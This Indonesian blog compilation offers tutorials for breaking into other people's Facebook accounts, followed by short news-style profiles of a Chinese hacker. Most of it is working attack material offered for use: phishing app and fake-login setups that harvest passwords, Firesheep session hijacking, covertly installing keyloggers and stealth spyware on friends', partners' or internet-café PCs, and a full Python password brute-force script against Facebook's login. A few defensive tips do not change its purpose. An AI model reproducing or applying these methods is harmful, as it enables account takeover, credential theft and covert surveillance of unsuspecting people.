hack akun facebook via facebook

Facebook, sapa sih yang gak kenal Facebook??? Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter. Facebook dikenal karena kemudahan dan tentunya keamanannya.

Aman?? 100%?? hem..tidak ada yang sempurna.. banyak para hacker yang berusaha menembus pertahanan Facebook, seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di Faceboook. Tehnik lain?? hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.

Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.

Tata cara nya sebagai berikut:

1. Download scriptnya dulu http://www.mediafire.com/?448qgmyux5o2mb8 atau http://idws.us/jjfjdc
2. Cari server gratisan atau injekkan yang support .PHP ( tanya om Google ) atau .ASP ( http://www.jabry.net )
3. Facebook tentunya
Mulai pembuatannya deh :
Sudah disiapkan scriptnya?? kalau sudah, ubahlah di bagian yang saya tandai menjadi alamat e-mail anda

.PHP  Code:

mail(
"youremailaddress@domain.com",

.ASP Code:

Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "youremailaddress@host.com"


lalu upload ke server anda..dan tugas pertama kita selesai. :)

Lalu masuk ke http://www.facebook.com/pages/create dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.
Disini dituntut kepandaian kita mengolah kata agar berkesan menarik. Contoh "Cek Kepopuleran FB Anda" dan selesaikan langkah yang di anjurkan.
Kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana. Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
Saatnya kita masuk ke http://www.facebook.com/add.php?api_key=...1e44&pages dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang sudah didownload tadi.
Jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita. Lihat gambar dibawah ini

Terakhir, kita share halaman yang udah kita buat tadi, lalu minta teman - teman kita buat meng-klik tombol "Like" usahakan minimal 25 orang yang nge-like. Jadi kita bisa membuat "username" untuk halaman kita, misal jadi "http://www.facebook.com/pagechecker" dan berharap orang-orang mencoba aplikasi kita, lalu boom..panen password deh....cek folder spam di server e-mail kita.

Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO
http://www.facebook.com/pages/Cek-Harga-...4949752878
tampilan kalau ada yang coba nih halaman kaya gini..

Dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he

Read More

HACK FACEBOOK VIA FAKELOGIN

Berikut adalah kumpulan lengkap berbagai cara hack facebook, berbagai cara hack fb, berbagai cara hack account facebook hack facebook teman hack facebook pacar, hack facebook musuh cara hack facebook cara hack facebook orang lain cara hack facebook cara hack fb cara hack password facebook cara hack fb 2011 cara hack facebook orang. Cara hack facebook 2011 cara hack fb orang lain cara hack fb terbaru cara hack fb 2011 cara hack fb orang cara hack akun fb cara hack akun fb orang lain cara hack akun facebook terbaru cara hack akun facebook 2011 cara hack password fb cara hack account fb cara hack account facebook. Cara hack account facebook 2011 cara hack account facebook terbaru cara hack facebook teman cara hack facebook pacar cara hack fb teman cara hack fb pacar crack facebook cara crack fb. Cara menjebol fb cara menjebol akun fb cara membobol password facebook cara menjebol password facebook cara membobol facebook cara mengetahui account facebook cara mengetahui password facebook cara menghack facebook tutorial hack facebook tutorial hacking facebook. Tutorial hack fb, tutorial hacking fb tutorial hacking account fb tutorial hacking account facebook, tutorial hack account facebook, tutorial hacking password facebook tutorial hack password facebook tutorial crack facebook.

Cara Hack Facebook Dengan Metode Fake Login / Phising / Scam

PERTAMA:

Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut, cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.

KEDUA:

Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.

1. Silahkan anda daftar di http://www.united.net.kg/ atau http://www.globalweb.com.ru/hosting.php atau http://biz.ht/
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com

2. setelah anda berhasil mendaftar, masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanel masing2 nantinya)

3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.

4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di web hosting yang tadi anda sudah daftar.

5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]

6, alright! selesai sampai di sini. . .

untuk penyebarannya silahkan dengan cara masing2…

disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di domain webhosting kalian..ambil URL nya.. [penting]

terus untuk pengguna firefox: buka tools>option>main


disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.

atau..

bisa juga menyebarkan dengan cara seperti ini

Berbagai Cara Hack Facebook

kamu buat account baru,di yahoo,gmail,ato sejenisnya

dengan nick Facebook@ or something like that.

diatas cm contoh…silahkan kamu buat seni sendiri
enjoy..

mudahkan ??

semoga berhasil . . ..

KETIGA:

Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,

1. download dan extract file index.html download dulu disini
2. download dan extract file logs.php download dulu disini
3. download dan extract file log.txt download dulu disini

Password : Flow

dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.

nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.

pengertian:
- index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
Ex: http://h1.ripway.com/nama_kalian/index.html
- logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
- logs.txt : Berfungsi untuk menampung hasil jerih payah kita
Ex: Email + Password Facebook.

sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.

saran bagi facebook’er :

1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’

4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.

Read More

FACEBOOK VIA NETWORK SNIFFING

Cara Hack Facebook Dengan Network Sniffing

PERTAMA:

Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.

KEDUA:

Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.

cara menggunakanya sebagai berikut:

1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.

nah gimana cara mencegah pencurian password dengan firesheep ini?

kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/

KETIGA:

Bismillah,

pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:

Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:

mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.

Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.

Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?

langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:

pertama-tama buka aplikasi wireshark
kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
host www.facebook.com and host alamat.ip.komputer.anda
Klik start, maka proses penyadapan akan segera dimulai
Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:

hasil statistik sniffing paket data facebook

Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.

Read More

Hack Facebook Dengan Keylogger

PERTAMA:

Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian menggunakan data tersebut untuk mendapatkan username dan password facebook. seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.

KEDUA:

Hai facebook’er! Tutorial facebook kali ini akan menjelaskan cara hack facebook dengan keylogger. Cara’nya gimana? Keylogger itu apa? Keylogger merupakan software yang berfungsi untuk memonitoring kegiatan PC dengan me’record / merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaan’nya. AMPUH! Mau ?

Bagi facebook’er yang belum mempunyai keylogger, bisa download secara gratis disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna gunakan yaitu keylogger yang bernama DOUGLAS 1.1.

Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri … hahahaha

Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaan’nya.

1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES .

2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol … hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi …

3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho

4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !!

5. Kalau proses penginstalan sudah selesai, terus ???

Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha

Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja … hahaha

Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda …



Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan.

Nah, Selese dah !!! Mudah to ???

Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut.

Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 … Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu..

Selamat mencoba

KETIGA:

SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari mana saja di dunia selama Anda memiliki akses internet.

Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata remote PC dengan panel kontrol yang AMAN.
Remote PC software Spy juga menyimpan screenshot bersama dengan teks log chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely, melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari Anda. Termasuk LIVE admin perintah dan kontrol.

Fitur SniperSpy :
1. Adalah perangkat lunak mata-mata SniperSpy deployable
2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi
3. Log Semua keystrokes
4. Records setiap Password (Email, Login, Instant Messenger dll)
5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai kegiatan IM
6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif
7. Real Time Screen Viewer
8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows saat ini
9. Lengkap, bypass Firewall apapun

Read More

Hack Facebook via Metode Bruteforce

PERTAMA:

Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.

KEDUA:
Postingan tentang hacking facebook ini gue copas aja dari situs jasakom.com :
Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )
Implementasi Facebook Hacking Dengan Brute Force
Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.
ok, cukup basa basinya rel…..to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.

Facebook BruteForce Script

Simple Dictionary Attack

Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.
OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )
1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya target@bego.com hingga pada code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory





setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di http://xxx.com/images/
jika di eksekusi maka script akan mencoba membruteforce account milik target lo.



Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
And last word, thanks for you attention if u read a simple tutorial.

KETIGA:



Silakan download FbBruteforce:

Berikut Codenya:


#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me

import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)

warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...

Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help

Example : %s -u brad@hackme.com -w wordlist.txt"

P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]

def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)

def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)

for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()

def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)

def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))

def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()

















if __name__ == '__main__':
main()

Read More

Profil si Hacker Cantik

Ia dikenal saat berusia 19 tahun, setahun setelah membentuk China Girl Security Team.

Xiao Tian, pemimpin kelompok hacker khusus wanita (baidu.com)

Penampilannya penuh gaya. Pakaian musim dingin serbahitam dipadu sepatu but setinggi betis. Kadang tangannya mengepit sebuah tas Louis Vuitton. Kalung berbandul keluaran Coco Chanel menghiasi lehernya. Senyum manis hampir selalu mewarnai bibirnya yang mungil.

Siapa yang menyangka bahwa gadis modis berusia 20 tahun ini mampu berperan mengusir raksasa mesin pencari, Google. Bersama rekan-rekannya di China Girl Security Team, gadis tersebut, Xiao Tian turut melancarkan serangan kepada perusahaan asal Amerika Serikat (AS) itu.

Google baru-baru ini menyatakan siap mengundurkan diri dari China dan menutup seluruh operasional mereka di sana. Raksasa mesin pencari itu mengaku sudah tidak tahan dengan gelombang serangan yang dilancarkan para hacker asal negeri Panda tersebut.

Xiao Tian, berarti surga kecil, mulai dikenal saat berusia 19 tahun, setahun setelah membentuk China Girl Security Team pada Maret 2007.

“Saya membentuk China Girl untuk memberi ruang bagi perempuan yang tidak dianggap dalam dunia hacker yang dijejali kaum Adam,” kata gadis kelahiran Hunan, 6 September 1989 ini.

Sehari-hari, Xiao Tian menuntut ilmu di Universitas Teknologi Xi'an. Penggemar kopi ini juga mengaku tergila-gila akan sepatu, terutama sepatu dengan warna yang mencolok. Namun Xiao Tian mengaku tidak akan membeli sepatu hanya karena sepatu itu cantik.

“Saya menyukai sepatu, namun saya tidak membeIi sepatu yang hanya akan membuat saya lelah dan tidak praktis,” tulis Xiao Tian di blognya.

Dalam blognya, Xiao Tian jarang menulis soal keberhasilannya meretas laman tertentu. Perempuan yang tinggal di distrik Chaoyang, Beijing, ini lebih sering bercerita mengenai tempat yang dia kunjungi.

Tulisannya pun lebih sering bernada melankolis meski dia mengaku tidak ingin menulis tentang kesedihan. “Saya tidak ingin menyebutkan hal-hal yang dapat membangkitkan penderitaan,” kata Xiao Tian.

Meski anggota klub hacker Xiao Tian masih relatif kecil dibandingkan dengan populasi hacker di China, tidak diragukan lagi bahwa Xiao Tian telah berada di jajaran selebritis hacker China. Awalnya, dia mengaku bahwa popularitas yang mendadak dia sandang sangat melelahkan.

Bos China Girl ini pun mengungkapkan bahwa dia hanya gadis biasa yang menggemari komputer dan blogging. Dalam resolusinya awal 2012 ini pun, Xiao Tian menyatakan tidak berencana meretas perusahaan lain. Xiao Tian justru berjanji akan menurunkan berat badan hingga mencapai 44 kilogram.

Read More

Hacker China Xiao Tian, Hacker Atau Artis ?

Google baru-baru ini menyatakan siap mengundurkan diri dari China dan menutup seluruh operasional mereka di sana. Alasannya, raksasa mesin pencari itu sudah tidak tahan dengan gelombang serangan yang dilancarkan para hacker asal negeri tirai bambu tersebut.

David Drummond, Senior Vice President, Corporate Development and Chief Legal Officer Google menyebutkan, pihaknya mendapati adanya ‘serangan yang sangat canggih’ yang berasal dari China terhadap infrastuktur Google.

